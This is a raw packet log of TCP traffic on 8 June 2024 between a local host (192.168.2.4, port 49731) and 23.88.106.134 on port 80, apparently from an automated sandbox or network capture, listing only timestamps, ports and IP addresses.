Jun 8, 2024 20:22:05.399704933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.399719000 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.399740934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.399756908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.399774075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.399794102 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.399823904 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.400346994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.400382996 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.400405884 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.400410891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.400430918 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.400445938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.400454044 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.400496960 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.400944948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.400979042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.401010990 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.401019096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.401035070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.401058912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.401076078 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.401093006 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.401113987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.401127100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.401137114 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.401179075 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.401818037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.401851892 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.401880980 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.401884079 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.401901960 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.401926041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.401933908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.401957035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.401976109 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.401989937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.402005911 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.402046919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.402538061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.402571917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.402606964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.402607918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.402628899 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.402643919 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.402658939 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.402673960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.402695894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.402719975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.403347015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.403383017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.403414965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.403415918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.403436899 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.403450012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.403460026 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.403480053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.403502941 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.403513908 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.403528929 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.403548956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.403558969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.403599977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.404500961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.404540062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.404567957 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.404573917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.404587030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.404607058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.404623985 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.404661894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.509634018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.509686947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.509746075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.509780884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.509819031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.509912968 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.509912968 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.509912968 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.510296106 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.510344982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.510381937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.510420084 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.510494947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.511116982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.511168003 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.511204958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.511209965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.511236906 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.511241913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.511255980 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.511296988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.511744976 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.511781931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.511814117 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.511816025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.511837959 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.511853933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.511868000 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.511889935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.511912107 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.511949062 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.512597084 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.512634039 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.512660980 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.512667894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.512681961 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.512703896 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.512722969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.512737989 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.512762070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.512792110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.513458014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.513494015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.513521910 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.513529062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.513540030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.513565063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.513585091 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.513600111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.513617039 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.513650894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.514266968 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.514305115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.514333010 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.514338970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.514350891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.514374971 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.514389038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.514409065 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.514430046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.514466047 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.515060902 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.515095949 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.515126944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.515130997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.515150070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.515165091 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.515178919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.515197039 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.515219927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.515261889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.515930891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.515965939 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.515999079 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.516000032 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.516021967 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.516035080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.516047001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.516069889 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.516093969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.516103983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.516124010 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.516160965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.516782999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.516819000 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.516844988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.516854048 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.516864061 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.516887903 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.516906023 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.516921997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.516942978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.516961098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.516984940 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.517014027 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.517415047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.517467022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.517474890 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.517502069 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.517520905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.517538071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.517559052 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.517573118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.517601013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.517627001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.518311024 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.518347025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.518377066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.518381119 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.518403053 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.518412113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.518420935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.518449068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.518471003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.518481970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.518513918 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.518522024 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.518538952 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.518573999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.519156933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.519191027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.519221067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.519221067 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.519243002 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.519256115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.519268036 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.519293070 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.519311905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.519328117 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.519350052 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.519380093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.519969940 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.520004034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.520032883 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.520037889 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.520055056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.520075083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.520091057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.520104885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.520128965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.520139933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.520153046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.520176888 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.520195007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.520236015 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.520803928 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.520838976 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.520868063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.520867109 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.520888090 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.520903111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.520925045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.520937920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.520947933 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.520972013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.520994902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.521012068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.521030903 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.521074057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.521651030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.521687031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.521716118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.521720886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.521733999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.521755934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.521779060 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.521789074 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.521804094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.521825075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.521845102 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.521878958 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.522542000 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.522578001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.522607088 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.522612095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.522625923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.522648096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.522664070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.522706032 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.522969961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.523003101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.523031950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.523032904 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.523050070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.523067951 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.523086071 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.523102999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.523118019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.523138046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.523158073 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.523192883 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.523849964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.523884058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.523912907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.523917913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.523933887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.523955107 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.523976088 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.523988008 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.524010897 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.524023056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.524044991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.524079084 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.524689913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.524724007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.524754047 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.524759054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.524771929 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.524794102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.524810076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.524828911 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.524851084 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.524862051 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.524887085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.524897099 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.524915934 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.524952888 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.525473118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.525506973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.525535107 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.525540113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.525554895 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.525574923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.525588989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.525609016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.525634050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.525645018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.525660992 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.525676966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.525701046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.525711060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.525734901 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.525748014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.525763988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.525801897 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.526453972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.526488066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.526516914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.526523113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.526535988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.526557922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.526573896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.526592970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.526611090 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.526628017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.526649952 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.526659966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.526668072 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.526715040 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.527487993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.527520895 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.527544975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.527555943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.527568102 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.527590990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.527607918 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.527625084 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.527645111 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.527658939 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.527682066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.527693987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.527715921 CEST	49731	80	192.168.2.4	23.88.106.134
